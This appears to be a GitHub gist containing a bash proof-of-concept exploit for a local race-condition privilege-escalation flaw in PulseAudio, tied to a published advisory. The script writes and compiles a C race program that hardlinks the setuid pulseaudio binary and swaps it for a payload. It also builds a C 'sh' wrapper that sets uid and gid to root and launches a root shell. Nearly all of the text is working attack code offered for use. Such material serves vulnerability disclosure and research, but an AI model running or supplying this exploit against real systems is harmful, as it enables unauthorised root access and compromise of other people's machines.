PulseAudio local race condition privilege escalation vulnerability - proof of concept (https://www.akitasecurity.nl/advisory/AK20090602/pulseaudio_local_race_privilege_escalation_vulnerability.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
pulseaudio=`which pulseaudio` | |
workdir="/tmp" | |
#workdir=$HOME | |
id=`which id` | |
shell=`which sh` | |
trap cleanup INT | |
function cleanup() | |
{ | |
rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c | |
rm -rf $workdir/PATMP* | |
} | |
cat > $workdir/pa_race.c << __EOF__ | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <time.h> | |
#include <sys/types.h> | |
#include <sys/wait.h> | |
#define PULSEAUDIO_PATH "$pulseaudio" | |
#define SH_PATH "$workdir/sh" | |
#define TMPDIR_TEMPLATE "$workdir/PATMPXXXXXX" | |
void _pause(long sec, long usec); | |
int main(int argc, char *argv[], char *envp[]) | |
{ | |
int status; | |
pid_t pid; | |
char template[sizeof(TMPDIR_TEMPLATE)]; | |
char *tmpdir; | |
char hardlink[sizeof(template) + 2]; | |
char hardlink2[sizeof(template) + 12]; | |
srand(time(NULL)); | |
for( ; ; ) | |
{ | |
snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE); | |
template[sizeof(template) - 1] = '\0'; | |
tmpdir = mkdtemp(template); | |
if(tmpdir == NULL) | |
{ | |
perror("mkdtemp"); | |
return 1; | |
} | |
snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir); | |
hardlink[sizeof(hardlink) - 1] = '\0'; | |
snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir); | |
hardlink2[sizeof(hardlink2) - 1] = '\0'; | |
/* this fails if $workdir is a different partition */ | |
if(link(PULSEAUDIO_PATH, hardlink) == -1) | |
{ | |
perror("link"); | |
return 1; | |
} | |
if(link(SH_PATH, hardlink2) == -1) | |
{ | |
perror("link"); | |
return 1; | |
} | |
pid = fork(); | |
if(pid == 0) | |
{ | |
char *argv[] = {hardlink, NULL}; | |
char *envp[] = {NULL}; | |
execve(hardlink, argv, envp); | |
perror("execve"); | |
return 1; | |
} | |
if(pid == -1) | |
{ | |
perror("fork"); | |
return 1; | |
} | |
else | |
{ | |
/* tweak this if exploit does not work */ | |
_pause(0, rand() % 500); | |
if(unlink(hardlink) == -1) | |
{ | |
perror("unlink"); | |
return 1; | |
} | |
if(link(SH_PATH, hardlink) == -1) | |
{ | |
perror("link"); | |
return 1; | |
} | |
waitpid(pid, &status, 0); | |
} | |
if(unlink(hardlink) == -1) | |
{ | |
perror("unlink"); | |
return 1; | |
} | |
if(unlink(hardlink2) == -1) | |
{ | |
perror("unlink"); | |
return 1; | |
} | |
if(rmdir(tmpdir) == -1) | |
{ | |
perror("rmdir"); | |
return 1; | |
} | |
} | |
return 0; | |
} | |
void _pause(long sec, long usec) | |
{ | |
struct timeval timeout; | |
timeout.tv_sec = sec; | |
timeout.tv_usec = usec; | |
if(select(0, NULL, NULL, NULL, &timeout) == -1) | |
{ | |
perror("select"); | |
} | |
} | |
__EOF__ | |
cat > $workdir/sh.c << __EOF__ | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <sys/types.h> | |
int main(int argc, char *argv[], char *envp[]) | |
{ | |
if(geteuid() != 0) | |
{ | |
return 1; | |
} | |
setuid(0); | |
setgid(0); | |
if(fork() == 0) | |
{ | |
argv[0] = "$id"; | |
argv[1] = NULL; | |
execve(argv[0], argv, envp); | |
return 1; | |
} | |
argv[0] = "$shell"; | |
argv[1] = NULL; | |
execve(argv[0], argv, envp); | |
return 1; | |
} | |
__EOF__ | |
gcc -o $workdir/pa_race $workdir/pa_race.c | |
gcc -o $workdir/sh $workdir/sh.c | |
$workdir/pa_race |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment